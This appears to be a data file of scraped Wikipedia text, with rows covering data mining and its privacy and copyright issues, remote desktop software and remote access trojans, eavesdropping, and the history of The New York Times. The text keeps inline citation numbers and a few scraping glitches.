vector machines (1990s). Data mining is the process of applying these methods with the intention of uncovering hidden patterns. 14 in large data sets. It bridges the gap from applied statistics and artificial intelligence (which usually provide the mathematical background) to database management by exploiting the way data is stored and indexed in databases to execute the actual learning and discovery algorithms more efficiently, allowing such methods to be applied to ever-larger data sets. The knowledge discovery in databases (KDD) process is commonly defined with the stages: It exists, however, in many variations on this theme, such as the Cross-industry standard process for data mining (CRISP-DM) which defines six phases: or a simplified process such as (1) Pre-processing, (2) Data Mining, and (3) Results Validation. Polls conducted in 2002, 2004, 2007 and 2014 show that the CRISP-DM methodology is the leading methodology used by data miners. 15 16 17 18 The only other data mining standard named in these polls was SEMMA. However, 3 4 times as many people reported using CRISP-DM. Several teams of researchers have published reviews of data mining process models, 19 and Azevedo and Santos conducted a comparison of CRISP-DM and SEMMA in 2008. 20 Before data mining algorithms can be used, a target data set must be assembled. As data mining can only uncover patterns actually present in the data, the target data set must be large enough to contain these patterns while remaining concise enough to be mined within an acceptable time limit. A common source for data is a data mart or data warehouse. Pre-processing is essential to analyze the multivariate data sets before data mining. The target set is then cleaned. Data cleaning removes the observations containing noise and those with missing data. Data mining involves six common classes of tasks: 5 Data mining can unintentionally be misused, producing results that appear to be significant but which do not actually predict future behavior and cannot be reproduced on a new sample of data, therefore bearing little use. This is sometimes caused by investigating too many hypotheses and not performing proper statistical hypothesis testing. A simple version of this problem in machine learning is known as overfitting, but the same problem can arise at different phases of the process and thus a train test split—when applicable at all—may not be sufficient to prevent this from happening. 21 The final step of knowledge discovery from data is to verify that the patterns produced by the data mining algorithms occur in the wider data set. Not all patterns found by the algorithms are necessarily valid. It is common for data mining algorithms to find patterns in the training set which are not present in the general data set. This is called overfitting. To overcome this, the evaluation uses a test set of data on which the data mining algorithm was not trained. The learned patterns are applied to this test set, and the resulting output is compared to the desired output. For example, a data mining algorithm trying to distinguish "spam" from "legitimate" e-mails would be trained on a training set of sample e-mails. Once trained, the learned patterns would be applied to the test set of e-mails on which it had not been trained. The accuracy of the patterns can then be measured from how many e-mails they correctly classify. Several statistical methods may be used to evaluate the algorithm, such as ROC curves. If the learned patterns do not meet the desired standards, it is necessary to re-evaluate and change the pre-processing and data mining steps. If the learned patterns do meet the desired standards, then the final step is to interpret the learned patterns and turn them into knowledge. The premier professional body in the field is the Association for Computing Machinery's (ACM) Special Interest Group (SIG) on Knowledge Discovery and Data Mining (SIGKDD). 22 23 Since 1989, this ACM SIG has hosted an annual international conference and published its proceedings, 24 and since 1999 it has published a biannual academic journal titled "SIGKDD Explorations". 25 Computer science conferences on data mining include: Data mining topics are also present in many data management database conferences such as the ICDE Conference, SIGMOD Conference and International Conference on Very Large Data Bases. There have been some efforts to define standards for the data mining process, for example, the 1999 European Cross Industry Standard Process for Data Mining (CRISP-DM 1.0) and the 2004 Java Data Mining standard (JDM 1.0). Development on successors to these processes (CRISP-DM 2.0 and JDM 2.0) was active in 2006 but has stalled since. JDM 2.0 was withdrawn without reaching a final draft. For exchanging the extracted models—in particular for use in predictive analytics—the key standard is the Predictive Model Markup Language (PMML), which is an XML-based language developed by the Data Mining Group (DMG) and supported as exchange format by many data mining applications. As the name suggests, it only covers prediction models, a particular data mining task of high importance to business applications. However, extensions to cover (for example) subspace clustering have been proposed independently of the DMG. 26 Data mining is used wherever there is digital data available. Notable examples of data mining can be found throughout business, medicine, science, finance, construction, and surveillance. While the term "data mining" itself may have no ethical implications, it is often associated with the mining of information in relation to user behavior (ethical and otherwise). 27 The ways in which data mining can be used can in some cases and contexts raise questions regarding privacy, legality, and ethics. 28 In particular, data mining government or commercial data sets for national security or law enforcement purposes, such as in the Total Information Awareness Program or in ADVISE, has raised privacy concerns. 29 30 Data mining requires data preparation which uncovers information or patterns which compromise confidentiality and privacy obligations. A common way for this to occur is through data aggregation. Data aggregation involves combining data together (possibly from various sources) in a way that facilitates analysis (but that also might make identification of private, individual-level data deducible or otherwise apparent). 31 This is not data mining per se, but a result of the preparation of data before—and for the purposes of—the analysis. The threat to an individual's privacy comes into play when the data, once compiled, cause the data miner, or anyone who has access to the newly compiled data set, to be able to identify specific individuals, especially when the data were originally anonymous. 32 It is recommended according to whom? to be aware of the following before data are collected: 31 Data may also be modified so as to become anonymous, so that individuals may not readily be identified. 31 However, even "anonymized" data sets can potentially contain enough information to allow identification of individuals, as occurred when journalists were able to find several individuals based on a set of search histories that were inadvertently released by AOL. 33 The inadvertent revelation of personally identifiable information leading to the provider violates Fair Information Practices. This indiscretion can cause financial, emotional, or bodily harm to the indicated individual. In one instance of privacy violation, the patrons of Walgreens filed a lawsuit against the company in 2011 for selling prescription information to data mining companies who in turn provided the data to pharmaceutical companies. 34 Europe has rather strong privacy laws, and efforts are underway to further strengthen the rights of the consumers. However, the U.S. E.U. Safe Harbor Principles, developed between 1998 and 2000, currently effectively expose European users to privacy exploitation by U.S. companies. As a consequence of Edward Snowden's global surveillance disclosure, there has been increased discussion to revoke this agreement, as in particular the data will be fully exposed to the National Security Agency, and attempts to reach an agreement with the United States have failed. 35 In the United Kingdom in particular there have been cases of corporations using data mining as a way to target certain groups of customers forcing them to pay unfairly high prices. These groups tend to be people of lower socio-economic status who are not savvy to the ways they can be exploited in digital market places. 36 In the United States, privacy concerns have been addressed by the US Congress via the passage of regulatory controls such as the Health Insurance Portability and Accountability Act (HIPAA). The HIPAA requires individuals to give their "informed consent" regarding information they provide and its intended present and future uses. According to an article in Biotech Business Week, i n practice, HIPAA may not offer any greater protection than the longstanding regulations in the research arena, says the AAHC. More importantly, the rule's goal of protection through informed consent is approach a level of incomprehensibility to average individuals. 37 This underscores the necessity for data anonymity in data aggregation and mining practices. U.S. information privacy legislation such as HIPAA and the Family Educational Rights and Privacy Act (FERPA) applies only to the specific areas that each such law addresses. The use of data mining by the majority of businesses in the U.S. is not controlled by any legislation. Under European copyright database laws, the mining of in-copyright works (such as by web mining) without the permission of the copyright owner is not legal. Where a database is pure data in Europe, it may be that there is no copyright—but database rights may exist, so data mining becomes subject to intellectual property owners' rights that are protected by the Database Directive. On the recommendation of the Hargreaves review, this led to the UK government to amend its copyright law in 2014 to allow content mining as a limitation and exception. 38 The UK was the second country in the world to do so after Japan, which introduced an exception in 2009 for data mining. However, due to the restriction of the Information Society Directive (2001), the UK exception only allows content mining for non-commercial purposes. UK copyright law also does not allow this provision to be overridden by contractual terms and conditions. Since 2020 also Switzerland has been regulating data mining by allowing it in the research field under certain conditions laid down by art. 24d of the Swiss Copyright Act. This new article entered into force on 1 April 2020. 39 The European Commission facilitated stakeholder discussion on text and data mining in 2013, under the title of Licences for Europe. 40 The focus on the solution to this legal issue, such as licensing rather than limitations and exceptions, led to representatives of universities, researchers, libraries, civil society groups and open access publishers to leave the stakeholder dialogue in May 2013. 41 US copyright law, and in particular its provision for fair use, upholds the legality of content mining in America, and other fair use countries such as Israel, Taiwan and South Korea. As content mining is transformative, that is it does not supplant the original work, it is viewed as being lawful under fair use. For example, as part of the Google Book settlement the presiding judge on the case ruled that Google's digitization project of in-copyright books was lawful, in part because of the transformative uses that the digitization project displayed—one being text and data mining. 42 The following applications are available under free open-source licenses. Public access to application source code is also available. The following applications are available under proprietary licenses. For more information about extracting information out of data (as opposed to analyzing data), see: |
364 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Remote_access_trojan | In computing, the term remote desktop refers to a software- or operating system feature that allows a personal computer's desktop environment to be run remotely from one system (usually a PC, but the concept applies equally to a server or a smartphone), while being displayed on a separate client device. Remote desktop applications have varying features. Some allow attaching to an existing user's session and "remote controlling", either displaying the remote control session or blanking the screen. Taking over a desktop remotely is a form of remote administration. Remote access can also be explained as the remote control of a computer by using another device connected via the internet or another network. This is widely used by many computer manufacturers and large businesses help desks for technical troubleshooting of their customer's problems. Remote desktop software captures the mouse and keyboard inputs from the local computer (client) and sends them to the remote computer (server). 1 The remote computer in turn sends the display commands to the local computer. When applications with many graphics including video or 3D models need to be controlled remotely, a remote workstation software that sends the pixels rather than the display commands must be used to provide a smooth, like-local experience. Remote desktop sharing is accomplished through a common client server model. The client, or VNC viewer, is installed on a local computer and then connects via a network to a server component, which is installed on the remote computer. In a typical VNC session, all keystrokes and mouse clicks are registered as if the client were actually performing tasks on the end-user machine. 2 Remote desktops also have a major advantage for security development, companies are able to permit software engineers who may be dispersed geographically to operate and develop from a computer which can be held within the companies office or cloud environment. The target computer in a remote desktop scenario is still able to access all of its core functions. Many of these core functions, including the main clipboard, can be shared between the target computer and remote desktop client. Since the onset of COVID 19, the shift to remote-work environments has led many to work from home with devices without enterprise IT support. As a result, these workers are reliant on remote desktop software to collaborate and keep their systems available and secure. 3 A main use of remote desktop software is remote administration and remote implementation. This need arises when software buyers are far away from their software vendor. Most remote access software can be used for "headless computers": instead of each computer having its own monitor, keyboard, and mouse, or using a KVM switch, one computer can have a monitor, keyboard, mouse, and remote control software, and control many headless computers. The duplicate desktop mode is useful for user support and education. Remote control software combined with telephone communication can be nearly as helpful for novice computer-users as if the support staff were actually there. Remote desktop software can be used to access a remote computer: a physical personal computer to which a user does not have physical access, but that can be accessed or interacted with. 4 Unlike servers, remote computers are mainly used for peer to peer connections, where one device is unattended. A remote computer connection is generally only possible if both devices have a network connection. Since the advent of cloud computing remote desktop software can be housed on USB hardware devices, allowing users to connect the device to any PC connected to their network or the Internet and recreate their desktop via a connection to the cloud. This model avoids one problem with remote desktop software, which requires the local computer to be switched on at the time when the user wishes to access it remotely. (It is possible with a router with C2S VPN support, and wake on LAN equipment, to establish a virtual private network (VPN) connection with the router over the Internet if not connected to the LAN, switch on a computer connected to the router, then connect to it.) Remote desktop products are available in three models: hosted service, software, and appliance. Tech support scammers use remote desktop software to connect to their victim's computer and will often lock out the computer if the victim does not cooperate. Remote desktop protocols include the following: A remote access trojan (RAT, sometimes called creepware) 6 is a type of malware that controls a system through a remote network connection. While desktop sharing and remote administration have many legal uses, "RAT" connotes criminal or malicious activity. A RAT is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from computer security software and other anti-virus software. 7 8 9 10 11 12 |
365 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Eavesdropping | Eavesdropping is the act of secretly or stealthily listening to the private conversation or communications of others without their consent in order to gather information. The verb eavesdrop is a back-formation from the noun eavesdropper ("a person who eavesdrops"), which was formed from the related noun eavesdrop ("the dripping of water from the eaves of a house; the ground on which such water falls"). 1 An eavesdropper was someone who would hang from the eave of a building so as to hear what is said within. The PBS documentaries Inside the Court of Henry VIII (April 8, 2015) 2 and Secrets of Henry VIII’s Palace (June 30, 2013) include segments that display and discuss "eavedrops", carved wooden figures Henry VIII had built into the eaves (overhanging edges of the beams in the ceiling) of Hampton Court to discourage unwanted gossip or dissension from the King's wishes and rule, to foment paranoia and fear, 2 and demonstrate that everything said there was being overheard; literally, that the walls had ears. 3 Eavesdropping vectors include telephone lines, cellular networks, email, and other methods of private instant messaging. Devices that support VoIP and other communication software are also vulnerable to electronic eavesdropping by computer viruses categorized as trojan viruses or more broadly as spyware. 4 Network eavesdropping is a network layer attack that focuses on capturing small packets from the network transmitted by other computers and reading the data content in search of any type of information. 5 This type of network attack is generally one of the most effective as a lack of encryption services are used and when the connection between the two endpoints are weak and not secure. 6 7 It is also linked to the collection of metadata. There is a growing importance of security in communication systems, specifically in wireless technology. The need for security measures at different levels, including software encryption, hardware protection (e.g., trusted platform modules), and even the physical layer using wave-front engineering is as crucial than ever. 8 Researchers have expressed the importance of addressing the privacy concerns from eavesdropping attacks because they impact the rights of users and the ability to have confidence in the devices as well as the entire Internet. Ensuring that users have trust and confidence in their Internet activities so users continue to engage actively in the system and share data. 9 |
366 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/The_New_York_Times | The New York Times (NYT) b is an American daily newspaper based in New York City. The New York Times covers domestic, national, and international news, and publishes opinion pieces, investigative reports, and reviews. As one of the longest-running newspapers in the United States, the Times serves as one of the country's newspapers of record. As of August 2024 update , The New York Times is the second-largest newspaper by print circulation in the United States, with 600,000 print subscribers. Including online subscribers, the Times has a circulation of 10.8 million, the most of any newspaper in the U.S. The New York Times is published by The New York Times Company; since 1896, the company has been chaired by the Ochs-Sulzberger family, whose current chairman and the paper's publisher is A. G. Sulzberger. The Times is headquartered at The New York Times Building in Midtown Manhattan. The Times was founded as the conservative New-York Daily Times in 1851, and came to national recognition in the 1870s with its aggressive coverage of corrupt politician William M. Tweed. Following the Panic of 1893, Chattanooga Times publisher Adolph Ochs gained a controlling interest in the company. In 1935, Ochs was succeeded by his son-in-law, Arthur Hays Sulzberger, who began a push into European news. Sulzberger's son-in-law Arthur Ochs became publisher in 1963, adapting to a changing newspaper industry and introducing radical changes. The New York Times was involved in the landmark 1964 U.S. Supreme Court case New York Times Co. v. Sullivan, which restricted the ability of public officials to sue the media for defamation. In 1971, The New York Times published the Pentagon Papers, an internal Department of Defense document detailing the United States's historical involvement in the Vietnam War, despite pushback from then-president Richard Nixon. In the landmark decision New York Times Co. v. United States (1971), the Supreme Court ruled that the First Amendment guaranteed the right to publish the Pentagon Papers. In the 1980s, the Times began a two-decade progression to digital technology and launched nytimes.com in 1996. In the 21st century, The New York Times has shifted its publication online amid the global decline of newspapers. The Times has expanded to several other publications, including The New York Times Magazine, The New York Times International Edition, and The New York Times Book Review. In addition, the paper has produced several television series, podcasts — including The Daily — and games through The New York Times Games. The New York Times has been involved in several controversies in its history. The Times maintains several regional bureaus staffed with journalists across six continents. The New York Times has received 137 Pulitzer Prizes as of 2023, the most of any publication, among other accolades. The New York Times was established in 1851 by New-York Tribune journalists Henry Jarvis Raymond and George Jones. 4 The Times experienced significant circulation, particularly among conservatives; New-York Tribune publisher Horace Greeley praised the New-York Daily Times. 5 During the American Civil War, Times correspondents gathered information directly from Confederate states. 6 In 1869, Jones inherited the paper from Raymond, 7 who had changed its name to The New-York Times. 8 Under Jones, the Times began to publish a series of articles criticizing Tammany Hall political boss William M. Tweed, despite vehement opposition from other New York newspapers. 9 In 1871, The New-York Times published Tammany Hall's accounting books; Tweed was tried in 1873 and sentenced to twelve years in prison. The Times earned national recognition for its coverage of Tweed. 10 In 1891, Jones died, creating a management imbroglio in which his children had insufficient business acumen to inherit the company and his will prevented an acquisition of the Times. 11 Editor-in-chief Charles Ransom Miller, editorial editor Edward Cary, and correspondent George F. Spinney established a company to manage The New-York Times, 12 but faced financial difficulties during the Panic of 1893. 13 In August 1896, Chattanooga Times publisher Adolph Ochs acquired The New-York Times, implementing significant alterations to the newspaper's structure. Ochs established the Times as a merchant's newspaper and removed the hyphen from the newspaper's name. 14 In 1905, The New York Times opened Times Tower, marking expansion. 15 The Times experienced a political realignment in the 1910s amid several disagreements within the Republican Party. 16 The New York Times reported on the sinking of the Titanic, as other newspapers were cautious about bulletins circulated by the Associated Press. 17 Through managing editor Carr Van Anda, the Times focused on scientific advancements, reporting on Albert Einstein's then-unknown theory of general relativity and becoming involved in the discovery of the tomb of Tutankhamun. 18 In April 1935, Ochs died, leaving his son-in-law Arthur Hays Sulzberger as publisher. 19 The Great Depression forced Sulzberger to reduce The New York Times's operations, 20 and developments in the New York newspaper landscape resulted in the formation of larger newspapers, such as the New York Herald Tribune and the New York World-Telegram. 21 In contrast to Ochs, Sulzberger encouraged wirephotography. 22 The New York Times extensively covered World War II through large headlines, 23 reporting on exclusive stories such as the Yugoslav coup d' tat. 24 Amid the war, Sulzberger began expanding the Times's operations further, acquiring WQXR-FM in 1944 — the first non-Times investment since the Jones era — and established a fashion show in Times Hall. Despite reductions as a result of conscription, The New York Times retained the largest journalism staff of any newspaper. 25 The Times's print edition became available internationally during the war through the Army Air Force Exchange Service; The New York Times Overseas Weekly later became available in Japan through The Asahi Shimbun and in Germany through the Frankfurter Zeitung. The international edition would develop into a separate newspaper. 26 Journalist William L. Laurence publicized the atomic bomb race between the United States and Germany, resulting in the Federal Bureau of Investigation seizing copies of the Times. The United States government recruited Laurence to document the Manhattan Project in April 1945. 27 Laurence became the only witness of the Manhattan Project, a detail realized by employees of The New York Times following the atomic bombing of Hiroshima. 28 Following World War II, The New York Times continued to expand. 29 The Times was subject to investigations from the Senate Internal Security Subcommittee, a McCarthyist subcommittee that investigated purported communism from within press institutions. Arthur Hays Sulzberger's decision to dismiss a copyreader who had pleaded the Fifth Amendment drew ire from within the Times and from external organizations. 30 In April 1961, Sulzberger resigned, appointing his son-in-law, The New York Times Company president Orvil Dryfoos. 31 Under Dryfoos, The New York Times established a newspaper based in Los Angeles. 32 In 1962, the implementation of automated printing presses in response to increasing costs mounted fears over technological unemployment. The New York Typographical Union staged a strike in December, altering the media consumption of New Yorkers. The strike left New York with three remaining newspapers — the Times, the Daily News, and the New York Post — by its conclusion in March 1963. 33 In May, Dryfoos died of a heart ailment. 34 Following weeks of ambiguity, Arthur Ochs Sulzberger became The New York Times's publisher. 35 Technological advancements leveraged by newspapers such as the Los Angeles Times and improvements in coverage from The Washington Post and The Wall Street Journal necessitated adaptations to nascent computing. 36 The New York Times published "Heed Their Rising Voices" in 1960, a full-page advertisement purchased by supporters of Martin Luther King Jr. criticizing law enforcement in Montgomery, Alabama for their response to the civil rights movement. Montgomery Public Safety commissioner L. B. Sullivan sued the Times for defamation. In New York Times Co. v. Sullivan (1964), the U.S. Supreme Court ruled that the verdict in Alabama county court and the Supreme Court of Alabama violated the First Amendment. 37 The decision is considered to be landmark. 38 After financial losses, The New York Times ended its international edition, acquiring a stake in the Paris Herald Tribune, forming the International Herald Tribune. 39 The Times initially published the Pentagon Papers, facing opposition from then-president Richard Nixon. The Supreme Court ruled in The New York Times's favor in New York Times Co. v. United States (1971), allowing the Times and The Washington Post to publish the papers. 40 The New York Times remained cautious in its initial coverage of the Watergate scandal. 41 As Congress began investigating the scandal, the Times furthered its coverage, 42 publishing details on the Huston Plan, alleged wiretapping of reporters and officials, 43 and testimony from James W. McCord Jr. that the Committee for the Re-Election of the President paid the conspirators off. 44 The exodus of readers to suburban New York newspapers, such as Newsday and Gannett papers, adversely affected The New York Times's circulation. 45 Contemporary newspapers balked at additional sections; Time devoted a cover for its criticism and New York wrote that the Times was engaging in "middle-class self-absorption". 46 The New York Times, the Daily News, and the New York Post were the subject of a strike in 1978, 47 allowing emerging newspapers to leverage halted coverage. 48 The Times deliberately avoided coverage of the AIDS epidemic, running its first front-page article in May 1983. Max Frankel's editorial coverage of the epidemic, with mentions of anal intercourse, contrasted with then-executive editor A. M. Rosenthal's puritan approach, intentionally avoiding descriptions of the luridity of gay venues. 49 Following years of waning interest in The New York Times, Sulzberger resigned in January 1992, appointing his son, Arthur Ochs Sulzberger Jr., as publisher. 50 The Internet represented a generational shift within the Times; Sulzberger, who negotiated The New York Times Company's acquisition of The Boston Globe in 1993, derided the Internet, while his son expressed antithetical views. times appeared on America Online's website in May 1994 as an extension of The New York Times, featuring news articles, film reviews, sports news, and business articles. 51 Despite opposition, several employees of the Times had begun to access the Internet. 52 The online success of publications that traditionally co-existed with the Times — such as America Online, Yahoo, and CNN — and the expansion of websites such as Monster.com and Craigslist that threatened The New York Times's classified advertisement model increased efforts to develop a website. 53 nytimes.com debuted on January 19 and was formally announced three days later. 54 The Times published domestic terrorist Ted Kaczynski's essay Industrial Society and Its Future in 1995, contributing to his arrest after his brother David recognized the essay's penmanship. 55 Following the establishment of nytimes.com, The New York Times retained its journalistic hesitancy under executive editor Joseph Lelyveld, refusing to publish an article reporting on the Clinton Lewinsky scandal from Drudge Report. nytimes.com editors conflicted with print editors on several occasions, including wrongfully naming security guard Richard Jewell as the suspect in the Centennial Olympic Park bombing and covering the death of Diana, Princess of Wales in greater detail than the print edition. 56 The New York Times Electronic Media Company was adversely affected by the dot-com crash. 57 The Times extensively covered the September 11 attacks. The following day's print issue contained sixty-six articles, 58 the work of over three hundred dispatched reporters. 59 Journalist Judith Miller was the recipient of a package containing a white powder during the 2001 anthrax attacks, furthering anxiety within The New York Times. 60 In September 2002, Miller and military correspondent Michael R. Gordon wrote an article for the Times claiming that Iraq had purchased aluminum tubes. The article was cited by then-president George W. Bush to claim that Iraq was constructing weapons of mass destruction; the theoretical use of aluminum tubes to produce nuclear material was speculation. 61 In March 2003, the United States invaded Iraq, beginning the Iraq War. 62 The New York Times attracted controversy after thirty-six articles 63 from journalist Jayson Blair were discovered to be plagiarized. 64 Criticism over then-executive editor Howell Raines and then-managing editor Gerald M. Boyd mounted following the scandal, culminating in a town hall in which a deputy editor criticized Raines for failing to question Blair's sources in article he wrote on the D.C. sniper attacks. 65 In June 2003, Raines and Boyd resigned. 66 Arthur Ochs Sulzberger Jr. appointed Bill Keller as executive editor. 67 Miller continued to report on the Iraq War as a journalistic embed covering the country's weapons of mass destruction program. Keller and then-Washington bureau chief Jill Abramson unsuccessfully attempted to subside criticism. Conservative media criticized the Times over its coverage of missing explosives from the Al Qa'qaa weapons facility. 68 An article in December 2005 disclosing warrantless surveillance by the National Security Agency contributed to further criticism from the George W. Bush administration and the Senate's refusal to renew the Patriot Act. 69 In the Plame affair, a Central Intelligence Agency inquiry found that Miller had become aware of Valerie Plame's identity through then-vice president Dick Cheney's chief of staff Scooter Libby, resulting in Miller's resignation. 70 During the Great Recession, The New York Times suffered significant fiscal difficulties as a consequence of the subprime mortgage crisis and a decline in classified advertising. 71 Exacerbated by Rupert Murdoch's revitalization of The Wall Street Journal through his acquisition of Dow Jones Company, The New York Times Company began enacting measures to reduce the newsroom budget. The company was forced to borrow $250 million (equivalent to $353.79 million in 2023) from Mexican billionaire Carlos Slim and fired over one hundred employees by 2010. 72 nytimes.com's coverage of the Eliot Spitzer prostitution scandal, resulting in the resignation of then-New York governor Eliot Spitzer, furthered the legitimacy of the website as a journalistic medium. 73 The Times's economic downturn renewed discussions of an online paywall; 74 The New York Times implemented a paywall in March 2011. 75 Abramson succeeded Keller, 76 continuing her characteristic investigations into corporate and government malfeasance into the Times's coverage. 77 Following conflicts with newly appointed chief executive Mark Thompson's ambitions, 78 Abramson was dismissed by Sulzberger Jr., who named Dean Baquet as her replacement. 79 Leading up to the 2016 presidential election, The New York Times elevated the Hillary Clinton email controversy 80 and the Uranium One controversy; 81 national security correspondent Michael S. Schmidt initially wrote an article in March 2015 stating that Hillary Clinton had used a private email server as secretary of state. 82 Donald Trump's upset victory contributed to an increase in subscriptions to the Times. 83 The New York Times experienced unprecedented indignation from Trump, who referred to publications such as the Times as "enemies of the people" at the Conservative Political Action Conference and tweeting his disdain for the newspaper and CNN. 84 In October 2017, The New York Times published an article by journalists Jodi Kantor and Megan Twohey alleging that dozens of women had accused film producer and The Weinstein Company co-chairman Harvey Weinstein of sexual misconduct. 85 The investigation resulted in Weinstein's resignation and conviction, 86 precipitated the Weinstein effect, 87 and served as a catalyst for the MeToo movement. 88 The New York Times Company vacated the public editor position 89 and eliminated the copy desk in November. 90 Sulzberger Jr. announced his resignation in December 2017, appointing his son, A. G. Sulzberger, as publisher. 91 Trump's relationship — equally diplomatic and negative — marked Sulzberger's tenure. 92 In September 2018, The New York Times published "I Am Part of the Resistance Inside the Trump Administration", an anonymous essay by a self-described Trump administration official later revealed to be Department of Homeland Security chief of staff Miles Taylor. 93 The animosity — which extended to nearly three hundred instances of Trump disparaging the Times by May 2019 — 94 culminated in Trump ordering federal agencies to cancel their subscriptions to The New York Times and The Washington Post in October 2019. 95 Trump's tax returns have been the subject of three separate investigations. c During the COVID 19 pandemic, the Times began implementing data services and graphs. 99 On May 23, 2020, The New York Times's front page solely featured U.S. Deaths Near 100,000, An Incalculable Loss, a subset of the 100,000 people in the United States who died of COVID 19, the first time that the Times's front page lacked images since they were introduced. 100 Since 2020, The New York Times has focused on broader diversification, developing online games and producing television series. 101 The New York Times Company acquired The Athletic in January 2022. 102 Since 1896, The New York Times has been published by the Ochs-Sulzberger family, having previously been published by Henry Jarvis Raymond until 1869 103 and by George Jones until 1896. 104 Adolph Ochs published the Times until his death in 1935, 105 when he was succeeded by his son-in-law, Arthur Hays Sulzberger. Sulzberger was publisher until 1961 106 and was succeeded by Orvil Dryfoos, his son-in-law, who served in the position until his death in 1963. 107 Arthur Ochs Sulzberger succeeded Dryfoos until his resignation in 1992. 108 His son, Arthur Ochs Sulzberger Jr., served as publisher until 2018. The New York Times's current publisher is A. G. Sulzberger, Sulzberger Jr.'s son. 91 As of 2023, the Times's executive editor is Joseph Kahn 109 and the paper's managing editors are Marc Lacey and Carolyn Ryan, having been appointed in June 2022. 110 The New York Times's deputy managing editors are Sam Dolnick, 111 Monica Drake, 112 and Steve Duenes, 113 and the paper's assistant managing editors are Matthew Ericson, 114 Jonathan Galinsky, Hannah Poferl, Sam Sifton, Karron Skog, 115 and Michael Slackman. 116 The New York Times is owned by The New York Times Company, a publicly traded company. The New York Times Company, in addition to the Times, owns Wirecutter, The Athletic, The New York Times Cooking, and The New York Times Games, and acquired Serial Productions and Audm. The New York Times Company holds undisclosed minority investments in multiple other businesses, and formerly owned The Boston Globe and several radio and television stations. 117 The New York Times Company is majority-owned by the Ochs-Sulzberger family through elevated shares in the company's dual-class stock structure held largely in a trust, in effect since the 1950s; 118 as of 2022, the family holds ninety-five percent of The New York Times Company's Class B shares, allowing it to elect seventy percent of the company's board of directors. 119 Class A shareholders have restrictive voting rights. 120 As of 2023, The New York Times Company's chief executive is Meredith Kopit Levien, the company's former chief operating officer who was appointed in September 2020. 121 As of March 2023, The New York Times Company employs 5,800 individuals, 101 including 1,700 journalists according to deputy managing editor Sam Dolnick. 122 Journalists for The New York Times may not run for public office, provide financial support to political candidates or causes, endorse candidates, or demonstrate public support for causes or movements. 123 Journalists are subject to the guidelines established in "Ethical Journalism" and "Guidelines on Integrity". 124 According to the former, Times journalists must abstain from using sources with a personal relationship to them and must not accept reimbursements or inducements from individuals who may be written about in The New York Times, with exceptions for gifts of nominal value. 125 The latter requires attribution and exact quotations, though exceptions are made for linguistic anomalies. Staff writers are expected to ensure the veracity of all written claims, but may delegate researching obscure facts to the research desk. 126 In March 2021, the Times established a committee to avoid journalistic conflicts of interest with work written for The New York Times, following columnist David Brooks's resignation from the Aspen Institute for his undisclosed work on the initiative Weave. 127 The New York Times editorial board was established in 1896 by Adolph Ochs. With the opinion department, the editorial board is independent of the newsroom. 166 Then-editor-in-chief Charles Ransom Miller served as opinion editor from 1883 until his death in 1922. 167 Rollo Ogden succeeded Miller until his death in 1937. 168 From 1937 to 1938, John Huston Finley served as opinion editor; in a prearranged plan, Charles Merz succeeded Finley. 169 Merz served in the position until his retirement in 1961. 170 John Bertram Oakes served as opinion editor from 1961 to 1976, when then-publisher Arthur Ochs Sulzberger appointed Max Frankel. 171 Frankel served in the position until 1986, when he was appointed as executive editor. 172 Jack Rosenthal was the opinion editor from 1986 to 1993. 173 Howell Raines succeeded Rosenthal until 2001, when he was made executive editor. 174 Gail Collins succeeded Raines until her resignation in 2006. 175 From 2007 to 2016, Andrew Rosenthal was the opinion editor. 176 James Bennet succeeded Rosenthal until his resignation in 2020. 177 As of July 2024 update , the editorial board comprises thirteen opinion writers. 178 The New York Times's opinion editor is Kathleen Kingsbury 179 and the deputy opinion editor is Patrick Healy. 115 The New York Times's editorial board was initially opposed to liberal beliefs, opposing women's suffrage in 1900 and 1914. The editorial board began to espouse progressive beliefs during Oakes' tenure, conflicting with the Ochs-Sulzberger family, of which Oakes was a member as Adolph Ochs's nephew; in 1976, Oakes publicly disagreed with Sulzberger's endorsement of Daniel Patrick Moynihan over Bella Abzug in the 1976 Senate Democratic primaries in a letter sent from Martha's Vineyard. Under Rosenthal, the editorial board took positions supporting assault weapons legislation and the legalization of marijuana, but publicly criticized the Obama administration over its portrayal of terrorism. 176 In presidential elections, The New York Times has endorsed a total of twelve Republican candidates and thirty Democratic candidates, and has endorsed the Democrat in every election since 1960. 180 181 j With the exception of Wendell Willkie, Republicans endorsed by the Times have won the presidency. In 2016, the editorial board issued an anti-endorsement against Donald Trump for the first time in its history. 182 The editorial board reduced its presence from several editorials each day to only for significant events in February 2020. Since August 2024, the board no longer endorses candidates in New York races . 183 Since 1940, editorial, media, and technology workers of The New York Times have been represented by the New York Times Guild. The Times Guild, along with the Times Tech Guild, are represented by the NewsGuild-CWA. 184 In 1940, Arthur Hays Sulzberger was called upon by the National Labor Relations Board amid accusations that he had discouraged Guild membership in the Times. Over the next few years, the Guild would ratify several contracts, expanding to editorial and news staff in 1942 and maintenance workers in 1943. 185 The New York Times Guild has walked out several times in its history, including for six and a half hours in 1981 186 and in 2017, when copy editors and reporters walked out at lunchtime in response to the elimination of the copy desk. 187 On December 7, 2022, the union held a one-day strike, 188 the first interruption to The New York Times since 1978. 189 The New York Times Guild reached an agreement in May 2023 to increase minimum salaries for employees and a retroactive bonus. 190 The Times Tech Guild is the largest technology union with collective bargaining rights in the United States. 191 As of August 2024, The New York Times has 10.8 million subscribers, with 10.2 million online subscribers and 600,000 print subscribers, 192 the second-largest newspaper by print circulation in the United States behind The Wall Street Journal. 193 The New York Times Company intends to have fifteen million subscribers by 2027. 194 The Times's shift towards subscription-based revenue with the debut of an online paywall in 2011 contributed to subscription revenue exceeding advertising revenue the following year, furthered by the 2016 presidential election and Donald Trump. 195 In 2022, Vox wrote that The New York Times's subscribers skew "older, richer, whiter, and more liberal"; to reflect the general population of the United States, the Times has attempted to alter its audience by acquiring The Athletic, investing in verticals such as The New York Times Games, and beginning a marketing campaign showing diverse subscribers to the Times. The New York Times Company chief executive Meredith Kopit Levien stated that the average age of subscribers has remained constant. 196 In October 2001, The New York Times began publishing DealBook, a financial newsletter edited by Andrew Ross Sorkin. The Times had intended to publish the newsletter in September, but delayed its debut following the September 11 attacks. 197 A website for DealBook was established in March 2006. 198 The New York Times began shifting towards DealBook as part of the newspaper's financial coverage in November 2010 with a renewed website and a presence in the Times's print edition. 199 